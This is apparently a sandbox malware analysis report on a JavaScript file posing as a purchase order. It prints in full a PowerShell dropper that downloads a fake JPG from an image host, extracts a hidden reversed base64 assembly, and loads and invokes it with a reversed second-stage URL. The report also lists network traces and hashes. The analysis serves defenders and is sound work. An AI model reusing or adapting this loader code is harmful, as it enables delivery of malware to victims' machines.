Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    19-12-2024 00:12

General

  • Target

    PO24090026.js

  • Size

    75KB

  • MD5

    2e461076f6618e8f34ac4ada5bcc55fd

  • SHA1

    343a6c8b272ee7c261c9a3fb1eda91f769cc18ed

  • SHA256

    943869c0fd11cfbfdbf3ba902377e1470be12c94a9f2d49c952a14a9700552b0

  • SHA512

    c4d0fc5f78321824c32493491cf0e29bb50a24294eb08e6934d206e4adeaa1aa1f7ddc2f443fe5e4ba9bb8d534443af61e9bdb8578573c66ab2f2b754d599985

  • SSDEEP

    1536:8Z4xzQ6VsYE/D5OK1hoFPqd50a+X7psEBCCB29f+JrdWXOUPmMcA9KBwbBs:8SzQ6Vo/9RzY

Score
10/10

Malware Config

Extracted

Language
ps1
Source
1
$parkinson = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg ';$paunches = New-Object System.Net.WebClient;$hebiter = $paunches.DownloadData($parkinson);$tsarevichi = [System.Text.Encoding]::UTF8.GetString($hebiter);$shilpit = '<<BASE64_START>>';$riotise = '<<BASE64_END>>';$percylite = $tsarevichi.IndexOf($shilpit);$marbleization = $tsarevichi.IndexOf($riotise);$percylite -ge 0 -and $marbleization -gt $percylite;$percylite += $shilpit.Length;$Rybnik = $marbleization - $percylite;$overbill = $tsarevichi.Substring($percylite, $Rybnik);$unvaccinated = -join ($overbill.ToCharArray() | ForEach-Object { $_ })[-1..-($overbill.Length)];$autosave = [System.Convert]::FromBase64String($unvaccinated);$chemotropism = [System.Reflection.Assembly]::Load($autosave);$queef = [dnlib.IO.Home].GetMethod('VAI');$queef.Invoke($null, @('txt.tirb/ved.2r.39b345302a075b1bc0d45b632eb9ee62-bup//:sptth', '$punkling', '$punkling', '$punkling', 'MSBuild', '$punkling', '$punkling','$punkling','$punkling','$punkling','$punkling','$punkling','1','$punkling','TaskName'));
URLs
ps1.dropper

https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg%20

exe.dropper

https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg%20

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\PO24090026.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2384
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$parkinson = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg ';$paunches = New-Object System.Net.WebClient;$hebiter = $paunches.DownloadData($parkinson);$tsarevichi = [System.Text.Encoding]::UTF8.GetString($hebiter);$shilpit = '<<BASE64_START>>';$riotise = '<<BASE64_END>>';$percylite = $tsarevichi.IndexOf($shilpit);$marbleization = $tsarevichi.IndexOf($riotise);$percylite -ge 0 -and $marbleization -gt $percylite;$percylite += $shilpit.Length;$Rybnik = $marbleization - $percylite;$overbill = $tsarevichi.Substring($percylite, $Rybnik);$unvaccinated = -join ($overbill.ToCharArray() | ForEach-Object { $_ })[-1..-($overbill.Length)];$autosave = [System.Convert]::FromBase64String($unvaccinated);$chemotropism = [System.Reflection.Assembly]::Load($autosave);$queef = [dnlib.IO.Home].GetMethod('VAI');$queef.Invoke($null, @('txt.tirb/ved.2r.39b345302a075b1bc0d45b632eb9ee62-bup//:sptth', '$punkling', '$punkling', '$punkling', 'MSBuild', '$punkling', '$punkling','$punkling','$punkling','$punkling','$punkling','$punkling','1','$punkling','TaskName'));"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2940

Network

  • flag-us
    DNS
    res.cloudinary.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    res.cloudinary.com
    IN A
    Response
    res.cloudinary.com
    IN CNAME
    ion.cloudinary.com.edgekey.net
    ion.cloudinary.com.edgekey.net
    IN CNAME
    e1315.dsca.akamaiedge.net
    e1315.dsca.akamaiedge.net
    IN A
    184.26.132.41
  • flag-gb
    GET
    https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg
    powershell.exe
    Remote address:
    184.26.132.41:443
    Request
    GET /dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg HTTP/1.1
    Host: res.cloudinary.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Content-Type: image/jpeg
    Content-Length: 2676697
    ETag: "e5745d252aadd8dc5931363c7261f0a8"
    Last-Modified: Mon, 16 Dec 2024 02:14:05 GMT
    Date: Thu, 19 Dec 2024 00:12:27 GMT
    Connection: keep-alive
    Cache-Control: public, no-transform, immutable, max-age=2592000
    x-request-id: 70d4331ee42414ff46f04161fd976324
    Access-Control-Expose-Headers: Content-Length,Content-Disposition,Content-Range,Etag,Server-Timing,Vary,X-Cld-Error,X-Robots-Tag,X-Content-Type-Options
    Access-Control-Allow-Origin: *
    Accept-Ranges: bytes
    Timing-Allow-Origin: *
    Server: Cloudinary
    Strict-Transport-Security: max-age=604800
    X-Content-Type-Options: nosniff
    Server-Timing: cld-akam;dur=4;start=2024-12-19T00:12:27.862Z;desc=hit,rtt;dur=60,content-info;desc="width=1920,height=1080,bytes=2676697,format=\"jpg\",o=1,crt=1734315244,ef=(17)"
  • 184.26.132.41:443
    https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg
    tls, http
    powershell.exe
    105.6kB
    2.8MB
    1612
    1996

    HTTP Request

    GET https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg

    HTTP Response

    200
  • 8.8.8.8:53
    res.cloudinary.com
    dns
    powershell.exe
    64 B
    160 B
    1
    1

    DNS Request

    res.cloudinary.com

    DNS Response

    184.26.132.41

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\CabE83F.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\TarE861.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • memory/2940-4-0x0000000002FB0000-0x0000000003030000-memory.dmp

    Filesize

    512KB

  • memory/2940-5-0x000000001B830000-0x000000001BB12000-memory.dmp

    Filesize

    2.9MB

  • memory/2940-6-0x0000000002240000-0x0000000002248000-memory.dmp

    Filesize

    32KB

  • memory/2940-41-0x0000000002FB0000-0x0000000003030000-memory.dmp

    Filesize

    512KB

  • memory/2940-43-0x000000001B030000-0x000000001B1DA000-memory.dmp

    Filesize

    1.7MB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.